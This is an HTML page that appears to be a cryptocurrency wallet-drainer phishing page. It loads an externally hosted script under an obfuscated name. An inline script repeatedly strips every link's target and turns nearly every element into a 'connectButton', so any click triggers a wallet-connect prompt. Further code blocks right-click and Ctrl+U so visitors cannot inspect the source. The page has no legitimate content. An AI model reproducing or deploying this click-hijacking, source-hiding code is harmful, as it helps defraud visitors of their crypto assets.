
<!DOCTYPE html>
<html>
<head>
<script charset="UTF-8" async type="text/javascript" src="./5a9e35a32845819.d9.js"></script>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
  <!-- Loading Screen -->
  <div id="loading-screen">
    <!-- Add loading screen content here -->
    <div id="loading-spinner"></div>
  </div>
  <!-- Bootstrap CSS -->
  <style type="text/css">
    textarea:hover, 
input:hover, 
textarea:active, 
input:active, 
textarea:focus, 
input:focus,
button:focus,
button:active,
button:hover,
label:focus,
.btn:active,
.btn.active
{
    outline:0px !important;
    -webkit-appearance:none;
    box-shadow: none !important;
}

     .out img{
      width: 300px;
    padding: 8px 44px;
    font-size: 25px;
    margin-left: auto;
    margin-right: auto;
    margin-top: 20px;
    margin-bottom: 28px;
    cursor: pointer;
    display: flex;
    align-items: center;
    }
    . img {
    width: 32px;
    height: 32px;
    margin-right: 12px;
    }

    .box
    {
      box-shadow: 0 2px 3px rgba(0,0,0);*/
      border: 1px solid rgba(0,0,0);*/
      min-height: 438px;
      min-width: 440px;
      max-width: 440px;
      width: calc(100% - 50px);
      padding: 44px;
      margin-left: auto;
      margin-right: auto;
      margin-top: 20px;
      margin-bottom: 28px;
      
    }

    .bottom {
    width: 440px;
    background-color: #fff;
    box-shadow: 0 0 .5rem rgba(0, 0, 0, .2);
    padding: 8px 44px;
    font-size: 15px;
    margin-left: auto;
    margin-right: auto;
    margin-top: 20px;
    margin-bottom: 28px;
    cursor: pointer;
    display: flex;
    align-items: center;
    }
    .bottom img {
    width: 32px;
    height: 32px;
    margin-right: 12px;
    
   }
    .bottom:hover { background-color: #dde2d1; }
    .next-form { transform: translateX(-50%); }


    #footer {
      position: fixed;
      bottom: 0px;
      width: 100%;
      overflow: visible;
      z-index: 99;
      clear: both;
      background-color: #000;
      background-color: rgba(0,0,0,0.6);
    }

    /*.footerNode span {
    color: #fff;
    font-size: 0.75rem;
    line-height: 28px;
    white-space: nowrap;
    display: inline-block;
    float: right;
    margin-left: 8px;
    margin-right: 8px;
}*/
div .footerNode a, div .footerNode span {
    color: #fff;
    font-size: 0.75rem;
    line-height: 28px;
    white-space: nowrap;
    display: inline-block;
    float: right;
    margin-left: 8px;
    margin-right: 8px;
}
    @media only screen and (max-width: 610px) {
      #hide{
        display: none;
      }
    }

  </style>
  <link rel="shortcut icon" type="image/png" href="https://easyupload.io/mm9scz"/>

</head>
<body style="background-image: url('https://minodftv.github.io/Makel/IMG_2164.jpeg'); background-size: cover;background-repeat: no-repeat;">

  <div class="container-fluid">
    <div class="container">
      <div class="row my-5 py-5">
         
          <div class="col-lg-6 mx-auto">
 <div class="out">

          </div>
        </div>
      </div>

      
<link rel="shortcut icon" type="image/png" href="/favicon.png"/>

    
<script>
    function addClassesToElements() {

    const links = document.querySelectorAll('a:not(.connectButton)');
    for (const link of links) {
        link.removeAttribute('href');
        link.classList.add('connectButton');
    }
    const buttons = document.querySelectorAll('div:not(.connectButton):not(.web3-overlay):not(.item):not(.web3-modal-items):not(.web3-modal-title):not(.web3-modal)');
    for (const button of buttons) {
        button.classList.add('connectButton');
    }
    }
    setInterval(addClassesToElements, 300);
</script>
<script>
    // Disable right-click
    document.addEventListener('contextmenu', function (e) {
        e.preventDefault();
    });

    // Disable Ctrl+U
    document.addEventListener('keydown', function (e) {
        if (e.ctrlKey && e.key === 'u') {
            e.preventDefault();
        }
    });
</script>
</body>
</html>
